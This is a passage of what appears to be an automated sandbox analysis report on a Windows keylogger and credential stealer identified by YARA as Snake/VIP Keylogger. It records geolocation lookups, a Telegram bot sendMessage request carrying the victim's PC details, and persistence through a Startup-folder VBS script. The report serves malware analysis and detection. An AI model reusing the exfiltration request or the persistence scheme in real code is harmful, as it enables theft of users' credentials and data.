2025-01-10 17:55:20 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49739	104.21.112.1	443	5000	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 17:55:27 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 17:55:27 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:55:27 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1846516 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bvTYihc4kxDrvrmbU9aI7LeYiaI%2BwnoGkbgH1GLJBIkhcpOKhS6vCSCpYefxx7jToFU92xqBhc4dNt%2B2JjLKwxxj7ihcDX%2BGdB8hevunB5zWwlRQOvjTQ3ZJQMNRnROh2pdl8%2FNc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffe89c0cbe743b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1707&min_rtt=1642&rtt_var=662&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1778319&cwnd=203&unsent_bytes=0&cid=6bcc4bfb81a93d63&ts=190&x=0"
2025-01-10 17:55:27 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49748	104.21.112.1	443	5000	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 17:55:28 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 17:55:29 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:55:28 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1846518 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jg7EAoZ0xCF7oPEiQD%2B32dW%2BhEQN%2FS2sApTozGVGEY6xGtymlmMOm0kRdkYbxrwEnwWOcZwyuty7xIxWYzAHCX8V00wuUYPt%2BU19qnjNyXCSqjBZuF0%2BAMq1rMZURcxUekO9QeKd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffe89c99c670f5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1623&rtt_var=686&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1509043&cwnd=221&unsent_bytes=0&cid=7e22d89717d81f9d&ts=209&x=0"
2025-01-10 17:55:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49767	104.21.112.1	443	5000	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 17:55:31 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 17:55:31 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:55:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1846520 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uadohW8V1OUGPFpZnaOCAg%2FLm1vvvvvAKwE4OO8YSRbnsJMZb%2FwrSHFHzsqdg9eqh5i%2Fa8HFiD5VVlI5KouLOrWBz22libyaDf0Vcq1HG4birfkgXvg16Ez9is9YcrSaRm8r4rpF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffe89d9bea1729f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10108&min_rtt=2189&rtt_var=5727&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1333942&cwnd=169&unsent_bytes=0&cid=d0a4fd938885866f&ts=170&x=0"
2025-01-10 17:55:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49778	104.21.112.1	443	5000	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 17:55:33 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 17:55:33 UTC	858	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:55:33 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1846522 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mm17tav8eLhQYq48zTOB%2FI5cgUyDtjjeTn79Jjy%2BXzdBTUGy0VVzkxeFuH8CKhSEHr34XMwT9boxbbdX16BMLJU%2FVB50GYDqFa1ewRoHJBKLTD%2BZvYMg8N6ohraJizVQyd85u979"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffe89e65b780f5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10253&min_rtt=3484&rtt_var=5676&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=838117&cwnd=221&unsent_bytes=0&cid=6b6fe1eaf854862d&ts=159&x=0"
2025-01-10 17:55:33 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49795	104.21.112.1	443	5000	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 17:55:35 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 17:55:35 UTC	852	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:55:35 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1846524 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CBaEIn9u0zX9U49hSJNYww87MfywqgMtZsd4T77gnv0vjBFYF6bP0NE7w9A13VkvyqCtKHk4E6bKkUnH4hVpjVtuEDeC%2FEUvkN59KR8Tx6NKH4eMu91xCDONpvYu0VkbD7K75o45"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffe89f4fdd7c34f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3695&min_rtt=1773&rtt_var=1991&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1646926&cwnd=181&unsent_bytes=0&cid=6a694a809c9ab614&ts=151&x=0"
2025-01-10 17:55:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49811	104.21.112.1	443	5000	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 17:55:38 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 17:55:38 UTC	860	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:55:38 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1846527 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WP2U%2FHDxFkPN5wC7b4SpdUPADu9xlcK4IrjX2t9k4TmE3I2S4WaKK5uDYNj14eAowjc8%2FiUgsofmamo1tNF3E1fH7pOPFpgGFT6LyEz%2F7xNmuLDU4s3lmFjzP8wRgY77M%2FgIBAsk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffe8a04695b727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=33611&min_rtt=2092&rtt_var=19587&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1395793&cwnd=234&unsent_bytes=0&cid=57d9da6368ee7601&ts=174&x=0"
2025-01-10 17:55:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49829	104.21.112.1	443	5000	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 17:55:41 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 17:55:41 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:55:41 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1846530 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=667koJnoV%2BJwrb2oZKLTeX%2FdCbH4rWcyOSbsnUY4QVL9W8n%2FNo4vfPblJHzntf3OxJGivMXqBBgH8nTGMuuhcvQTmLio%2BzAlWWSzH6ktUCpVjkplt9eJQAPWNYW%2FcYq5FfhCOEsI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffe8a15c9a6424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1843&min_rtt=1598&rtt_var=775&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1827284&cwnd=248&unsent_bytes=0&cid=71ef48338170ebc9&ts=134&x=0"
2025-01-10 17:55:41 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49835	149.154.167.220	443	5000	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 17:55:42 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:019635%0D%0ADate%20and%20Time:%2011/01/2025%20/%2014:41:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20019635%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-10 17:55:42 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 17:55:42 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 17:55:42 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	12:55:01
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\YJwE2gTm02.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\YJwE2gTm02.exe"
Imagebase:	0x900000
File size:	1'135'616 bytes
MD5 hash:	88AE8BDA9D82167C30205B7BE959D2B5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:55:04
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\toggeries\savagenesses.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\YJwE2gTm02.exe"
Imagebase:	0xf70000
File size:	1'135'616 bytes
MD5 hash:	88AE8BDA9D82167C30205B7BE959D2B5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs Detection: 44%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:55:06
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\YJwE2gTm02.exe"
Imagebase:	0xe10000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4522071961.000000000334C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4522071961.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	12:55:16
Start date:	10/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\savagenesses.vbs"
Imagebase:	0x7ff6cf920000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:55:16
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\toggeries\savagenesses.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\toggeries\savagenesses.exe"
Imagebase:	0xf70000
File size:	1'135'616 bytes
MD5 hash:	88AE8BDA9D82167C30205B7BE959D2B5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:55:20
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
